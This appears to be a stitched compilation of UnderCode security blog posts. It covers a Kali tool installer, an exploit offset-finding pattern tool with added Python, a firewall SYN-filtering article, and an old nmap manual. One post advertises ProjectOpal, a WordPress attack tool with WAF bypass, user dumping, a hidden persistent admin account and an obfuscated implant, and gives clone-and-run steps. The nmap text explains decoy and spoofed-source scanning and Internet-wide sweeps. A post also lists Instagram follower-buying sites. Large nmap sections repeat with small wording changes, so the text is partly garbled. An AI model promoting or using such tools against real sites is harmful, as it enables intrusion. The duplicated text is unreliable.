========================================
Lalin: automatic pentest tool installer for Kali
Lalin is a shell script that installs a set of pentest packages with up-to-date tools, adds "lazy" wrapper commands for running them (for example lazynmap), and can install further tools and update them later. It is a remake of lazykali with bugs fixed, new features added and the tool list brought up to date, and it is compatible with the latest Kali release.
pinterest.com/undercodeOfficial
Let's start:
1) git clone https://github.com/Screetsec/LALIN
2) cd LALIN
3) sudo chmod +x Lalin.sh
4) sudo ./Lalin.sh
The script runs as root and installs packages system-wide, so read Lalin.sh before step 4 and check which repositories and download URLs it pulls from.
Tested by UnderCode on Kali with the GNOME desktop.
========================================
exploit-pattern (updated 2020): generate and search a cyclic pattern string for exploit development
twitter.com/unDERCODENews
Let's start:
1) git clone https://github.com/Svenito/exploit-pattern
2) cd exploit-pattern
3) Generate a pattern of a given length, here 100 bytes. The pattern is the usual "Aa0Aa1Aa2..." sequence of (upper-case letter, lower-case letter, digit) triplets, 20280 bytes long before it repeats, and a 4-byte fragment occurs only once inside it, which is what makes the offset lookup unambiguous:
$> pattern.py 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
4) Search for the fragment that ended up in a register or in the saved return address, either as the four characters it contains:
$> pattern.py Bf4B
Pattern Bf4B first occurrence at position 942 in pattern.
or as the hex value read from the debugger. A hex value is interpreted little-endian, so 0x42346642 is the bytes 42 66 34 42 = "Bf4B" and gives the same offset:
$> pattern.py 0x42346642
Pattern 0x42346642 first occurrence at position 942 in pattern.
5) Use it in your own Python code. After placing pattern.py in the same directory as your script:
from pattern import pattern_gen
print(pattern_gen(10))
or
from pattern import pattern_search
found_at = pattern_search('Bf4B')
@underCodeTesting
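To make the offset-finding step concrete, here is a stand-alone re-implementation of the same cyclic pattern. This is added example code, not the exploit-pattern project's pattern.py; the function names pattern_gen and pattern_search mirror the ones above, but the code, the 64-bit handling and the big-endian fallback are ours and are not features the page attributes to the tool.

```python
"""Cyclic pattern for finding the offset that overwrites a saved return address.

Added example, not the exploit-pattern project's own pattern.py. The pattern
is the usual sequence of (upper-case letter, lower-case letter, digit)
triplets: Aa0Aa1 ... Aa9Ab0 ... Zz9. It is 26*26*10*3 = 20280 bytes long
before it would repeat, and any 4-byte window inside it occurs only once,
so a 4-byte fragment read from a crashed register identifies one offset.
"""
from string import ascii_lowercase, ascii_uppercase, digits

MAX_PATTERN_LENGTH = len(ascii_uppercase) * len(ascii_lowercase) * len(digits) * 3  # 20280


def pattern_gen(length: int) -> str:
    """Return the first `length` bytes of the cyclic pattern as a str."""
    if not 0 < length <= MAX_PATTERN_LENGTH:
        raise ValueError(f"length must be between 1 and {MAX_PATTERN_LENGTH}")
    out = []
    produced = 0
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                if produced >= length:
                    return "".join(out)[:length]
                out.append(upper + lower + digit)
                produced += 3
    return "".join(out)[:length]


def needle_from(value: str):
    """Turn a user-supplied value into the text to look for.

    'Bf4B'       -> the literal text.
    '0x42346642' -> a register value, decoded little-endian (the order in
                    which an x86/x86-64 CPU loaded the pattern bytes into
                    EIP/RIP), so 0x42346642 is bytes 42 66 34 42 = 'Bf4B'.
    Values above 32 bits are decoded as 8 bytes for 64-bit registers
    (an extension of what the page shows).
    Returns (text, came_from_hex).
    """
    if value.lower().startswith("0x"):
        number = int(value, 16)
        width = 4 if number <= 0xFFFFFFFF else 8
        raw = number.to_bytes(width, "little")
        # latin-1 never fails to decode; non-ASCII bytes simply will not be found
        return raw.decode("latin-1"), True
    return value, False


def pattern_search(value: str) -> int:
    """0-based offset of `value` inside the full pattern.

    Raises ValueError when the value does not occur at all, which usually
    means the register did not come from the pattern (wrong buffer, or the
    bytes were mangled on the way in).
    """
    needle, from_hex = needle_from(value)
    haystack = pattern_gen(MAX_PATTERN_LENGTH)
    pos = haystack.find(needle)
    if pos == -1 and from_hex:
        # Not the little-endian reading; try the bytes the other way round
        # (value copied from a big-endian target, or typed byte-swapped).
        pos = haystack.find(needle[::-1])
    if pos == -1:
        raise ValueError(f"pattern {value!r} not found")
    return pos


if __name__ == "__main__":
    import sys

    arg = sys.argv[1] if len(sys.argv) > 1 else "0x42346642"
    if arg.isdigit():
        print(pattern_gen(int(arg)))
    else:
        print(f"Pattern {arg} first occurrence at position {pattern_search(arg)} in pattern.")
```

Run it with a length to print a pattern, or with a fragment or 0x-prefixed register value to get the offset; the offset is the number of bytes of padding to place before the address you want to land in the return slot.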
========================================
ProjectOpal: WordPress attack script for Linux and Termux (2020)
T.me/UnderCodeTesting
Features:
1) WAF (web application firewall) bypass
2) Hidden/stealthy operation
3) Log in as any user
4) Dump all user entries
5) Create a persistent, hidden admin account
6) Obfuscated implant
7) Multiple functions in one tool
Installation & run:
1) git clone https://github.com/shadowlabscc/ProjectOpal.git
2) cd ProjectOpal
3) python opal.py
@underCodeOfficial
========================================
2020 popular Instagram follower sites with free trials (no password required):
These are the most popular services, but they have not been tested by UnderCode:
fb.com/underCodeTesting
> https://famoid.com/buy-instagram-followers/
> https://www.followerpackages.com/buy-instagram-followers/
> https://www.genuinelikes.com/buy-instagram-followers.php
> https://www.getrealboost.com/buy-real-instagram-followers/
> https://krootez.com/buy-real-instagram-followers/
> https://buyiglikesfast.com/
> https://cheapigfollowers.com/
> https://friendlylikes.com/
> https://brsm.io/buy-real-active-instagram-followers/
There are many more such sites; we chose the most popular services.
If a site's trial is not available, try again after a few hours :)
========================================
Enhance network security with SYN packet characteristics, by UnderCode:
twitter.com/UnderCodeNews
Let's start:
1) Consider the following situation: the internal network is 198.199.1.0/24, and a Linux box acts as router and firewall to the Internet. On the firewall, eth0 faces the Internet and eth1 faces the internal network.
2) To let internal users browse the web, the following pair of ipchains rules is set (in ipchains a port range written "1024:" means 1024 through 65535, and "www" is port 80 from /etc/services):
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
4) The first rule accepts packets arriving on eth1 from an unprivileged port (1024 and above) of an internal host to port 80 on any Internet host; the second accepts packets arriving on eth0 from port 80 on any Internet host to an unprivileged port on an internal host, which is what the replies look like. The problem is that the second rule is stateless: it also accepts a brand-new connection initiated from the Internet, as long as the attacker sets the source port to 80 and aims at an internal port above 1024. Many services listen above 1024 (X11 on 6000, NFS on 2049, and so on), so this is a real exposure. The characteristics of the SYN packet let us close it.
5) First look at the flag bits in the TCP header. TCP has six flags: URG, ACK, PSH, RST, SYN and FIN. We care about ACK, SYN and FIN.
6) ACK: indicates whether the acknowledgment number field is valid (1 = valid, 0 = ignore it). The acknowledgment number is the sequence number of the next byte the sender expects to receive, not the last byte it got. The very first packet of a connection, the one that requests it, has ACK = 0; every packet after it has ACK = 1.
7) SYN: used to set up a connection. It is 1 in the connection request and 1 in the reply that accepts the request (where it is combined with ACK); in every later packet of the connection SYN is 0. So SYN alone means CONNECTION REQUEST and SYN together with ACK means CONNECTION ACCEPTED.
FIN: used to close the connection.
8) Summarised as a table:
ACK  SYN  meaning of the TCP packet
 0    1   connection request (first packet of the three-way handshake)
 1    1   connection request accepted (second packet, SYN/ACK)
 1    0   acknowledgment of the acceptance (third packet)
 1    0   data packet
...  ...
9) What we call a SYN packet is the connection request packet: SYN = 1, ACK = 0, FIN = 0. Only this packet can open a new connection, so to block connection attempts it is enough to filter out SYN packets; every other packet belongs to a connection that already exists.
10) In ipchains the -y option matches exactly these packets (SYN set, ACK and FIN clear):
-p tcp -s x.x.x.x/x -y
For example, all SYN packets from 192.168.1.0/24:
-p tcp -s 192.168.1.0/24 -y
Prefixing -y with ! inverts the match and selects all non-SYN packets:
-p tcp -s x.x.x.x/x ! -y
So, in the example above, the network can be hardened like this:
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp ! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
The second rule now accepts only non-SYN packets from port 80, i.e. the SYN/ACK and the data packets of a connection an internal host opened itself; an Internet host can no longer open a connection to a port above 1024 on an intranet host by sending from port 80. Two caveats: the filter is still stateless, so a packet with ACK set that belongs to no connection (an ACK scan, for instance) still reaches the internal port and relies on the host to reject it; and ipchains belongs to the Linux 2.2 kernel. On iptables the same match is spelled --syn / ! --syn, and the proper replacement is connection tracking (-m state --state ESTABLISHED,RELATED), which accepts replies only for connections the firewall actually saw being opened.
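To see the difference between the two rule sets without a 2.2 kernel, here is a small model of a stateless ipchains-style filter. This is added example code for this article, not ipchains itself: it implements only address and port ranges, the incoming interface and the -y / ! -y flag test, and runs the two rule sets from the text against constructed packets (203.0.113.0/24 is documentation address space). It also includes the ACK-only probe from the caveat above, which the hardened rule still lets through.

```python
"""Stateless packet filter model for the two ipchains rule sets above.

Added example for this article, not ipchains code. It reproduces just enough
of ipchains' matching (address/port ranges, interface, and the -y / ! -y flag
test) to show why the second rule set is safe and the first is not. The rule
values are the ones from the text; the sample packets are constructed.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    iface: str          # interface the packet arrived on
    syn: bool = False
    ack: bool = False
    fin: bool = False

    @property
    def is_syn(self) -> bool:
        # ipchains -y: SYN set, ACK and FIN clear = a connection request.
        # A SYN/ACK (second handshake packet) is NOT matched by -y.
        return self.syn and not self.ack and not self.fin


@dataclass(frozen=True)
class Rule:
    src: str                    # network in CIDR form, 0.0.0.0/0 for "any"
    sport: range                # ipchains "1024:" = range(1024, 65536)
    dst: str
    dport: range
    iface: str
    syn: Optional[bool] = None  # True = -y, False = ! -y, None = don't care
    target: str = "ACCEPT"

    def matches(self, p: Packet) -> bool:
        return (
            ip_address(p.src) in ip_network(self.src)
            and p.sport in self.sport
            and ip_address(p.dst) in ip_network(self.dst)
            and p.dport in self.dport
            and p.iface == self.iface
            and (self.syn is None or p.is_syn == self.syn)
        )


def evaluate(chain: List[Rule], p: Packet, policy: str = "DENY") -> str:
    """First matching rule wins, as in an ipchains chain; otherwise the policy."""
    for rule in chain:
        if rule.matches(p):
            return rule.target
    return policy


INTERNAL = "198.199.1.0/24"
ANY = "0.0.0.0/0"
WWW = range(80, 81)
UNPRIV = range(1024, 65536)   # ipchains "1024:"

# Rule set from steps 2) and 3): replies are accepted by source port alone.
WEAK = [
    Rule(INTERNAL, UNPRIV, ANY, WWW, "eth1"),
    Rule(ANY, WWW, INTERNAL, UNPRIV, "eth0"),
]

# Hardened rule set: the inbound rule carries "! -y", so only non-SYN
# packets from port 80 are accepted.
HARDENED = [
    Rule(INTERNAL, UNPRIV, ANY, WWW, "eth1"),
    Rule(ANY, WWW, INTERNAL, UNPRIV, "eth0", syn=False),
]

# Constructed sample traffic (203.0.113.0/24 is documentation space).
SAMPLES: Dict[str, Packet] = {
    # internal browser opens a connection to a web server
    "outbound_request": Packet("198.199.1.10", 40000, "203.0.113.5", 80, "eth1", syn=True),
    # the server's SYN/ACK and a later data segment coming back
    "reply_synack": Packet("203.0.113.5", 80, "198.199.1.10", 40000, "eth0", syn=True, ack=True),
    "reply_data": Packet("203.0.113.5", 80, "198.199.1.10", 40000, "eth0", ack=True),
    # attacker opens a NEW connection to X11 (6000) on an intranet host,
    # using source port 80 to look like a web reply
    "attack_syn": Packet("203.0.113.66", 80, "198.199.1.10", 6000, "eth0", syn=True),
    # ACK-only probe: no connection behind it, but it is not a SYN packet
    "probe_ack": Packet("203.0.113.66", 80, "198.199.1.10", 6000, "eth0", ack=True),
}


def verdicts(chain: List[Rule]) -> Dict[str, str]:
    """Decision of a chain for each sample packet, keyed by packet name."""
    return {name: evaluate(chain, pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for label, chain in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, verdicts(chain))
```

The weak chain accepts the attacker's SYN to port 6000; the hardened chain denies it while still accepting the SYN/ACK and data of the connection the internal host opened. The ACK-only probe is accepted by both, which is the limit of what a stateless SYN test can do.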
References:
1) IPCHAINS-HOWTO
2)Internet firewall domain network security
3) Computer network
WRITTEN BY UNDERCODE
========================================
Full UnderCode tutorial: Nmap network security scanner instructions
PART 1
instagram.com/underCodeTestingCompany
Let's start:
(This tutorial follows the option syntax of the classic nmap 2.x man page, which the copyright notice at the end dates to 1997-1999. Current releases spell several of these options differently, e.g. -iL instead of -i, -Pn instead of -P0 and --host-timeout instead of --host_timeout, so check nmap --help on your own version.)
-i <inputfilename>
Reads target specifications from the given file instead of the command line. The file holds a list of hosts or networks separated by spaces, tabs or newlines. To read from standard input, for example at the end of a pipe, give a hyphen (-) as the file name. The target specification section below describes the syntax of the entries.
-p <port range>
Specifies which ports to scan. For example, '-p 23' probes only port 23 of the target host(s), and '-p 20-30,139,60000-' scans ports 20 through 30, port 139 and everything above 60000. The default is to scan ports 1 to 1024 plus every port listed in the services file that ships with nmap.
-F
Fast scan mode: scans only the ports listed in the services file that ships with nmap. This is obviously much faster than scanning all 65535 ports.
-D <decoy1,decoy2[,ME],...>
Runs the scan with decoys. The decoy addresses you list appear in the target's logs as additional sources of the scan, so the target sees port scans coming from several IPs and cannot tell which one is real and which are cover. This defeats route-based tracing and is a practical way to hide your IP. Separate the decoys with commas. Put 'ME' at the position where you want your real address to appear; if you put it in sixth place or later, some port-scan loggers (such as Solar Designer's excellent scanlogd) will probably not show your IP at all. If you omit 'ME', nmap places your address at a random position. Keep in mind that the hosts you use as decoys should be up, otherwise you may accidentally SYN-flood your target with half-open connections, and that it is easy to spot the real scanner if only one of the listed addresses is actually live. Use IP addresses rather than names, so that the target's name server logs do not record you. Remember also that some (stupid) "port scan detectors" firewall or drop the route to any host that scans them; you could therefore inadvertently cut off connectivity between the scanned machine and the decoy hosts, which is a serious problem if a decoy is, say, its Internet gateway or even localhost. So use this option with care, and for ethical reasons too: it is a deception, after all. Decoys are used both in the initial ping sweep (ICMP, SYN, ACK or whatever) and in the port scan itself, and also for remote OS detection (-O). Too many decoys are useless: they only slow the scan down and may reduce accuracy. Some ISPs filter spoofed packets, although most (almost all) place no restriction on them.
-S <IP_Address>
In some circumstances nmap cannot determine your source address (it tells you when this is the case); then use -S with your IP address. Another possible use is to make the target think that someone else is scanning it. Imagine a company being repeatedly port-scanned by a competitor :) . This is not a supported usage, or rather not the main purpose, of this option; it is mentioned so that people think twice before accusing someone whose address shows up in a port scan log. Maybe he is innocent. -e is generally required for this kind of use.
-e <interface>
Tells nmap which interface to send and receive packets on. nmap normally detects this automatically, and prompts for it when it cannot.
PART 2: NMAP FULL
-g <portnumber>
Sets the source port used in the scan. Many naive firewalls and packet filters make an exception in their rule set so that DNS (53) or FTP-DATA (20) packets can come in and establish a connection. This is obviously thoughtless: an intruder just has to set the source port to masquerade as FTP or DNS. For UDP scans try 53 first; for TCP scans try 20 and then 53. Note that this is only a request; nmap honours it only when it can. For example, TCP ISN sampling cannot be done entirely from one host:port to one host:port, so nmap changes the source port even if you gave -g. Expect a small performance penalty on some scans when using this option, because nmap sometimes stores useful information in the source port number.
-M <max sockets>
Sets the maximum number of sockets used in parallel for a TCP connect() scan (the default scan type). This is useful to slow the scan down a little and avoid crashing remote machines. Another approach is -sS, which is generally easier on the target.
Timing options
--------*
nmap generally scans as fast as the network permits, but occasionally some hosts or ports are missed because its default timing does not suit the target (think of it as a timeout setting). The following options control the scan timing:
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane>
A convenient way to express a timing policy. Paranoid mode scans very slowly to avoid detection by IDS logging: it serializes all probes (nothing runs in parallel) and generally waits at least 5 minutes between packets. Sneaky is similar but sends a packet every 15 seconds. Polite is meant to ease network load and reduce the chance of crashing machines: it serializes the probes and waits at least 0.4 seconds between them. Normal is the default behaviour, which scans as fast as possible without overloading the network or missing hosts and ports. Aggressive adds a 5-minute timeout per host and never waits more than 1.25 seconds for a probe response. Insane is for very fast networks or for when you do not mind losing some information: it times out hosts after 75 seconds and waits only 0.3 seconds for a probe, which does let you "sweep" a fast network :) . You can also use the numbers 0-5, e.g. '-T 0' means Paranoid and '-T 5' means Insane. These templates cannot be combined with the lower-level controls given below.
--host_timeout <milliseconds>
Total time nmap spends on a single host before giving up on it. Not set by default.
--max_rtt_timeout <milliseconds>
Maximum time nmap waits for a probe response from the remote host before retransmitting or timing out the probe. Default 9000.
--initial_rtt_timeout <milliseconds>
Initial probe timeout. Mostly useful when scanning firewalled hosts with -P0, since otherwise nmap gets a good RTT estimate from the pings and the first few probes. Default 6000.
--max_parallelism <number>
Maximum number of probes nmap may have outstanding at once. Setting this to 1 means nmap scans only one port at a time. It also affects other parallel scans such as ping sweeps and RPC scans.
--scan_delay <milliseconds>
Minimum time nmap must wait between two probes. This reduces network load and makes the scan less conspicuous in IDS logs.
Target specification
--------*
Everything on the command line that is not an option is taken as a target specification. The simplest form is a single host name or IP address. To scan a whole subnet, append '/mask' to the host name or IP address; the mask must be between 0 (the entire Internet) and 32 (a single host). Use /24 for a class C network and /16 for a class B.
...
nmap also supports list and range notation for each octet of an address. To scan the class B network 128.210.*.*, you can write '128.210.*.*' or '128.210.0-255.0-255' or even '128.210.1-50,51-255.1,2,3,4,5-255'. You can also use the mask form '128.210.0.0/16'. All of these cover the same class B (the last form leaves out the .0 values in the third and fourth octets). Remember that most shells require the '*' to be quoted.
Another interesting trick is to "slice" the whole Internet in other ways. For example, '*.*.5.6-7' scans every IP address ending in .5.6 or .5.7. See the examples section for more.
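As an added example (our own code, not nmap's), here is a small parser for the target notation just described: '*', comma lists and ranges in each octet, and the '/mask' form. Host names are not resolved, so it runs offline, and the count function is the check worth running before a scan, since '*.*.2.3-5' is 196608 addresses and the three "class B" spellings above do not all expand to the same number.

```python
"""Expand nmap-style target specifications into IPv4 addresses.

Added example, not nmap's own code. It implements the notation described
above for numeric targets: '*' or a comma list of values and ranges
('1-50,51-255') in each octet, and the '/mask' CIDR form. Host names are
not resolved, so the example runs offline.
"""
import itertools
from ipaddress import ip_network
from typing import Iterator, List


def expand_octet(spec: str) -> List[int]:
    """'*' -> 0..255; '5' -> [5]; '1-50,51-255,7' -> sorted unique values."""
    if spec == "*":
        return list(range(256))
    values = set()
    for part in spec.split(","):
        if "-" in part:
            lo_s, hi_s = part.split("-", 1)
            # An open end ('-10', '200-') is taken as 0 or 255; this follows
            # later nmap versions and is an assumption for the 2.x syntax.
            lo = int(lo_s) if lo_s else 0
            hi = int(hi_s) if hi_s else 255
        else:
            lo = hi = int(part)
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad octet range {part!r} in {spec!r}")
        values.update(range(lo, hi + 1))
    return sorted(values)


def split_octets(spec: str) -> List[str]:
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four octets in {spec!r}")
    return octets


def iter_targets(spec: str) -> Iterator[str]:
    """Yield every dotted-quad address covered by `spec`, lazily.

    Like nmap, a CIDR block includes its network and broadcast addresses,
    and host bits in the prefix are ignored ('192.168.1.77/30' is the
    whole /30 around .77).
    """
    if "/" in spec:
        for addr in ip_network(spec, strict=False):
            yield str(addr)
        return
    ranges = [expand_octet(o) for o in split_octets(spec)]
    for combo in itertools.product(*ranges):
        yield ".".join(map(str, combo))


def count_targets(spec: str) -> int:
    """Number of addresses `spec` expands to, without materialising them."""
    if "/" in spec:
        return ip_network(spec, strict=False).num_addresses
    product = 1
    for octet in split_octets(spec):
        product *= len(expand_octet(octet))
    return product


def expand_targets(spec: str, limit: int = 4096) -> List[str]:
    """Materialise a spec as a list, refusing to build absurdly large ones."""
    n = count_targets(spec)
    if n > limit:
        raise ValueError(f"{spec!r} expands to {n} addresses, above limit {limit}")
    return list(iter_targets(spec))


if __name__ == "__main__":
    for s in ("128.210.*.1-127", "128.210.0.0/16",
              "128.210.1-50,51-255.1,2,3,4,5-255", "*.*.2.3-5", "10.0.0.1-3"):
        print(f"{s:36} -> {count_targets(s)} addresses")
    print(expand_targets("10.0.0.1-3"))
```

Use count_targets on whatever you are about to pass to nmap; a typo such as a stray '*' turns a /24 into the whole Internet, and the count makes that visible before any packet is sent.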
Scanning examples
--------*
Here are some examples of nmap use, from the simplest to the more complex. Note that real numbers and real domain names are used to make the examples concrete; substitute your own network names and addresses. Although port scanning, and analysing its results, may make some people nervous, I do not think it is illegal. I have scanned hundreds or thousands of machines and received only one complaint. But I am not a lawyer and some people are annoyed by nmap probes, so it is best to get permission before scanning, or scan at your own risk.
nmap -v target.example.com
Scans all reserved TCP ports on target.example.com; -v means verbose mode.
nmap -sS -O target.example.com/24
Starts a SYN half-open scan against the class C subnet that target.example.com sits in, and also tries to determine the operating system of each host that is up. This requires root privileges because half-open scanning and OS detection need raw sockets.
nmap -sX -p 22,53,110,143,4564 128.210.*.1-127
Sends an Xmas tree scan to the first half of each of the 255 possible 8-bit subnets in the class B address space 128.210, checking whether the systems run sshd, DNS, pop3d, imapd, or something on port 4564. Note that the Xmas scan does not work against Microsoft machines because of their deficient TCP stack; the same goes for Cisco, IRIX, HP/UX and BSDI.
nmap -v -p 80 '*.*.2.3-5'
Instead of targeting a range of hosts, this targets a slice of the whole Internet: it scans every IP address ending in .2.3, .2.4 or .2.5 for a web server. Use -sS as well if you are root. You will also find more interesting machines starting at 127, so you may want to replace the first asterisk with '127-222'; IMHO there are a lot of interesting machines in that region.
host -l company.com | cut -d ' ' -f 4 | ./nmap -v -i -
Does a DNS zone transfer to find the hosts in company.com and feeds their IP addresses to nmap via standard input. This command line works on my GNU/Linux box; other operating systems may need different options.
Bugs
----*
Bugs? What bugs? If you find one, please tell me, and the next version will be that much better :). Send the OS "fingerprints" along with it, so that I have enough data to fix the detection.
Author
----*
Fyodor
Distribution
----*
The latest version of nmap can be obtained from the following URL (copyright information follows):
http://www.insecure.org/nmap/
nmap is (C) 1997, 1998, 1999 by Fyodor (fyodor@dhp.com, fyodor@insecure.org)
libpcap is also distributed along with nmap. It is copyrighted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The version distributed with nmap may be modified; pristine sources are available from ftp://ftp.ee.lbl.gov/libpcap.tar.Z.
========================================
Another interesting thing is that you can "split" the entire network in other ways. For example, you can use '*. *. 5.6-7' to scan all IP addresses ending in .5.6 or .5.7. For more information, you can look at the example section.
Scanning example
-------- *
Here are some examples of scanning using nmap, from the simplest to the most complex ones. Note that there are real numbers and some real domain names-this makes the scanning behavior more specific. Here you can replace the addresses / names with your own network name. Although the analysis of the results of the port scan may make some people vulnerable, I don't think it is illegal. I have scanned hundreds or thousands of machines but received only one complaint. But I am not a lawyer and some people are annoyed by nmap detection, so it is best to scan or-risk after getting permission, the consequences are at your own risk.
nmap -v target.example.com
Scans all reserved TCP ports on target.example.com; -v turns on verbose mode.
nmap -sS -O target.example.com/24
Launches a half-open (SYN) scan against the class C subnet containing target.example.com and also tries to determine which operating system each live host is running. This requires root privileges, because both SYN scanning and OS detection need raw sockets.
nmap -sX -p 22,53,110,143,4564 128.210.*.1-127
Sends an Xmas tree scan to the first half of every subnet in the 128.210 class B address space. We are checking whether the systems run sshd, DNS, pop3d, imapd, or anything on port 4564. Note that because of deficiencies in Microsoft's TCP stack, Xmas scanning does not work against Windows machines: they answer every port with a RST, so everything looks closed. The same problem applies to CISCO, IRIX, HP/UX, and BSDI.
nmap -v -p 80 '*.*.2.3-5'
Rather than focusing on one IP range, it is sometimes interesting to slice up the entire address space and scan a small sample from each chunk. This command finds web servers on every machine whose address ends in .2.3, .2.4, or .2.5. If you are root you can add -sS. You will also find more interesting machines starting at 127, so you may want to replace the first asterisk with '127-222'; IMHO that region has a greater density of interesting machines.
host -l company.com | cut -d ' ' -f 4 | ./nmap -v -i -
Does a DNS zone transfer to find the hosts in company.com and feeds the resulting IP addresses to nmap on standard input (current nmap releases spell this option -iL -). Expect the transfer to be refused by most name servers unless you administer the zone. These commands are for my GNU/Linux box; you may need different commands or options on other operating systems.
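As an added illustration of the target notation used in the examples above (my own code, not nmap's, written against the notation as the page describes it: '*' for a whole octet, 'a-b' ranges and comma lists per octet), here is a small expander that counts and enumerates the addresses a spec covers and shows which of them fall inside a network you are authorised to scan. The network 10.20.0.0/16 in the usage line is an assumed example.

```python
"""Expand nmap-style target specs such as '*.*.2.3-5' or '128.210.*.1-127'.

Added illustration of the notation, not nmap's own code.  Each octet may be
'*' (0-255), a single value, a range 'a-b' (either end may be omitted), or a
comma-separated list of those.
"""

import ipaddress
import itertools


def parse_octet(spec):
    """Values covered by one octet spec, in the order given."""
    if spec == "*":
        return list(range(256))
    values = []
    for part in spec.split(","):
        if "-" in part:
            lo, hi = part.split("-", 1)
            lo = int(lo) if lo else 0      # '-5' means 0-5
            hi = int(hi) if hi else 255    # '250-' means 250-255
        else:
            lo = hi = int(part)
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad octet range {part!r}")
        values.extend(range(lo, hi + 1))
    return values


def parse_spec(spec):
    """Four per-octet value lists for a dotted spec."""
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError("expected four dotted octets")
    return [parse_octet(o) for o in octets]


def count_targets(spec):
    """How many addresses a spec covers, without materialising them."""
    n = 1
    for values in parse_spec(spec):
        n *= len(values)
    return n


def expand_targets(spec, limit=100_000):
    """Every address the spec covers; refuses to enumerate huge sweeps."""
    n = count_targets(spec)
    if n > limit:
        raise ValueError(f"{spec} covers {n} addresses, over the limit of {limit}")
    for a, b, c, d in itertools.product(*parse_spec(spec)):
        yield f"{a}.{b}.{c}.{d}"


def sample_slice(spec, network):
    """Addresses of a sweep like '*.*.2.3-5' that land inside `network`,
    i.e. what the sweep would touch in a range you are allowed to scan."""
    net = ipaddress.ip_network(network, strict=False)
    lo = int(net.network_address).to_bytes(4, "big")
    hi = int(net.broadcast_address).to_bytes(4, "big")
    # Per-octet pruning: every address inside the network has each octet
    # between the matching octets of the network's first and last address.
    # The final membership test makes the result exact for prefixes that do
    # not fall on an octet boundary.
    octets = [[v for v in values if lo[i] <= v <= hi[i]]
              for i, values in enumerate(parse_spec(spec))]
    hits = []
    for a, b, c, d in itertools.product(*octets):
        addr = ipaddress.ip_address(f"{a}.{b}.{c}.{d}")
        if addr in net:
            hits.append(str(addr))
    return hits


if __name__ == "__main__":
    for s in ("*.*.2.3-5", "128.210.*.1-127", "127-222.*.2.3-5"):
        print(f"{s:>18}: {count_targets(s):>9} addresses")
    print(sample_slice("*.*.2.3-5", "10.20.0.0/16"))
```

count_targets() is the number worth looking at before pressing Enter: '*.*.2.3-5' is 196,608 probes and '128.210.*.1-127' is 32,512, which is why expand_targets() refuses to enumerate past a limit by default.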
Bugs
----
Bugs? What bugs? If you find one, tell me, and the next version will be that much better :). Remember to send the OS "fingerprints" along with your report so that I have enough data to fix it...
Author
------
Fyodor
Distribution
------------
The latest version of nmap can be obtained from the following URL (copyright information follows):
http://www.insecure.org/nmap/
nmap is (C) 1997, 1998, 1999 by Fyodor (fyodor@dhp.com, fyodor@insecure.org)
libpcap is also distributed along with nmap. It is copyrighted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The version distributed with nmap may be modified; pristine sources are available from ftp://ftp.ee.lbl.gov/libpcap.tar.Z.
NMAP 3
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com).
๐ฆ This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).
It should also be noted that Nmap has been known to crash certain poorly written applications, TCP/IP stacks, and even operating systems. Nmap should never be run against mission-critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks, and we disclaim all liability for any damage or problems Nmap could cause.
All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.
Appendix:
Platforms nmap runs on
----------------------
Portability
nmap was developed under Linux, but it now runs on many platforms. Thanks to Lamont Granquist for his great help in running nmap's automated builds and tests on many platforms I have no access to. The following is a brief list of systems that support nmap:
OS                      Compiles  TCP scan (-sT)  SYN scan (-sS)  FIN scan (-sF)  Frag scan (-f)  OS Detection (-O)
Linux                   Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
FreeBSD                 Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
OpenBSD                 Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
NetBSD                  Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
Solaris 2.4-7           Yes!      Yes!            Yes!            Yes!            No :(           Yes!
SunOS 4.1.4 w/ gcc      Yes!      Yes!            Yes!            Yes!            No :(           Yes!
IRIX 5.3-6.4            Yes!      Yes!            Yes!            Yes!            No :(           Yes!
HP/UX 10.20             Yes!      Yes!            Yes!            Yes!            Yes!            Unknown
BSDI 2.1 and up         Yes!      Yes!            Yes!            Yes!            Unknown         Yes!
AIX (use cc, not gcc)   Yes!      Yes!            No :(           No :(           No :(           No :(
Digital UNIX / Alpha    Yes!      Yes!            POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0        Yes!      Yes!            No :(           No :(           No :(           No :(
